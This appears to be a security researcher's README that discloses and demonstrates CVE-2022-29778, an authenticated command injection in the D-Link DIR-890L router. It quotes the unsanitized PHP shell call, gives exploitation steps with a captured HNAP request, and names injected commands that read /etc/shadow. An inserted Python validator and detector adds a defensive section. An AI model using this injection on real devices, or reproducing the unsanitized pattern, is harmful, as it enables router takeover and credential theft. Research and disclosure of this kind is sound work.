TyeYeah/DIR-890L-1.20-RCE
D-Link DIR-890L RCE

Affected Version: <= v1.22B01 Hotfix (latest)

Firmware: Here

This model has reached the end of its life-cycle. The resources associated with these products have ceased their development and are no longer supported. D-Link Systems, Inc. recommends retiring these products and replacing them with products that receive firmware updates.

Vulnerability

In the firmware's web scripts there is a function getWOLMAC in SetVirtualServerSettings.php:

function getWOLMAC($ipv4addr)
{
	// $ipv4addr is concatenated into the shell command line as-is, with no validation or escaping
	$cmd = "scut -p ".$ipv4addr." -f 3 /proc/net/arp";
	setattr("/runtime/wakeonlan/mac", "get", $cmd);
	$mac = get("", "/runtime/wakeonlan/mac");
	del("/runtime/wakeonlan/mac");
	return $mac;
}

$cmd is built by concatenating $ipv4addr directly into the shell command without any filtering, and the function is called from:

$ipv4addr = get("x", "LocalIPAddress");
...
if($description == "Wake-On-Lan")
{
	$wolmac = getWOLMAC($ipv4addr);
	set($vsvr_entry.":".$InDeX."/wakeonlan_mac", $wolmac);
}

So when $description (the virtual server name) is set to "Wake-On-Lan", the LocalIPAddress value reaches the shell unfiltered, which gives RCE (remote command execution) through the Virtual Server page /VirtualServer.html.
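The check that getWOLMAC() is missing, plus a small audit routine for SetVirtualServerSettings requests of the shape captured below, as an added example; this is not code from the repository or from the D-Link firmware. It assumes the request body has no XML namespace on the HNAP elements (as in the captured packet) and uses constructed sample values; the strict dotted-quad rule rejects anything that is not a bare IPv4 literal, which is the only input a /proc/net/arp lookup needs.

```python
import ipaddress
import xml.etree.ElementTree as ET


def is_strict_ipv4(value: str) -> bool:
    """Accept only a bare dotted-quad IPv4 literal (no whitespace, no extra
    characters, no IPv6, no CIDR). This is the validation getWOLMAC() lacks
    before $ipv4addr is placed on a shell command line."""
    if not isinstance(value, str) or value != value.strip():
        return False
    try:
        addr = ipaddress.IPv4Address(value)
    except ValueError:
        return False
    # Round-trip comparison also rejects non-canonical spellings such as
    # leading zeros, which older Python versions would otherwise accept.
    return str(addr) == value


def audit_virtual_server_request(body: str) -> list:
    """Return one finding per VirtualServerInfo entry whose LocalIPAddress is
    not a strict IPv4 literal. An entry described as Wake-On-Lan is the path
    that reaches getWOLMAC(), so it is rated high; other entries are still
    reported because the same value may be used elsewhere."""
    root = ET.fromstring(body.encode("utf-8"))
    findings = []
    for entry in root.iter("VirtualServerInfo"):
        desc = entry.findtext("VirtualServerDescription") or ""
        ip = entry.findtext("LocalIPAddress") or ""
        if is_strict_ipv4(ip):
            continue
        findings.append({
            "description": desc,
            "local_ip": ip,
            "severity": "high" if desc == "Wake-On-Lan" else "medium",
        })
    return findings


def soap_body(description: str, local_ip: str) -> str:
    """Build a SetVirtualServerSettings envelope in the shape of the captured
    request (constructed sample input; both values are substituted verbatim)."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetVirtualServerSettings>
      <VirtualServerList>
        <VirtualServerInfo>
          <Enabled>true</Enabled>
          <VirtualServerDescription>{description}</VirtualServerDescription>
          <ExternalPort>1</ExternalPort>
          <InternalPort>1</InternalPort>
          <ProtocolType>TCP</ProtocolType>
          <ProtocolNumber>6</ProtocolNumber>
          <LocalIPAddress>{local_ip}</LocalIPAddress>
          <ScheduleName></ScheduleName>
        </VirtualServerInfo>
      </VirtualServerList>
    </SetVirtualServerSettings>
  </soap:Body>
</soap:Envelope>"""


if __name__ == "__main__":
    # Constructed inputs: a legitimate rule and one whose address field is not an IP.
    for desc, ip in (("Wake-On-Lan", "192.168.0.100"),
                     ("Wake-On-Lan", "192.168.0.100;not-an-ip")):
        print(desc, repr(ip), audit_virtual_server_request(soap_body(desc, ip)))
```

On the firmware side the same rule applies: getWOLMAC() should refuse (or return an empty string for) any $ipv4addr that fails this test before $cmd is ever built; on the monitoring side, an HNAP SetVirtualServerSettings request whose LocalIPAddress is anything other than a plain IPv4 literal is a strong signal of an attempt against this bug.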

Exploit

  • It requires authentication, so log in first. (screenshots: Login, Home)

  • Then visit the Virtual Server page (/VirtualServer.html), which is not reachable from the panel menus. (screenshot: Virtual Server)

  • Add a rule named Wake-On-Lan. (screenshots: Add rule, Rule results)

  • Start Burp Suite before clicking the Save button and capture the following request: (screenshot: packet)

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetVirtualServerSettings"
HNAP_AUTH: A4A816AE6CF2AC5537B0EB390FFB591C 1436839665
Content-Length: 765
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/VirtualServer.html
Cookie: uid=ZeNYZag3Gw

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetVirtualServerSettings>
			<VirtualServerList>
				<VirtualServerInfo>
					<Enabled>true</Enabled>
					<VirtualServerDescription>Wake-On-Lan</VirtualServerDescription>
					<ExternalPort>1</ExternalPort>
					<InternalPort>1</InternalPort>
					<ProtocolType>TCP</ProtocolType>
					<ProtocolNumber>6</ProtocolNumber>
					<LocalIPAddress>192.168.0.100</LocalIPAddress>
					<ScheduleName></ScheduleName>
				</VirtualServerInfo>
			</VirtualServerList>
		</SetVirtualServerSettings>
	</soap:Body>
</soap:Envelope>

  • Prepare an HTTP server, then: (screenshot: python server)

  • Use the Repeater module to test the RCE (remote command execution): (screenshot: burpsuite)

  • And we get: (screenshot: result)

  • Test command injection and read /etc/shadow: (screenshots: command ls /busy/box, result; command ls /busybox -al, result; command cat /etc/shadow, result)

About

Analysis and PoC for D-Link DIR-890L RCE (CVE-2022-29778)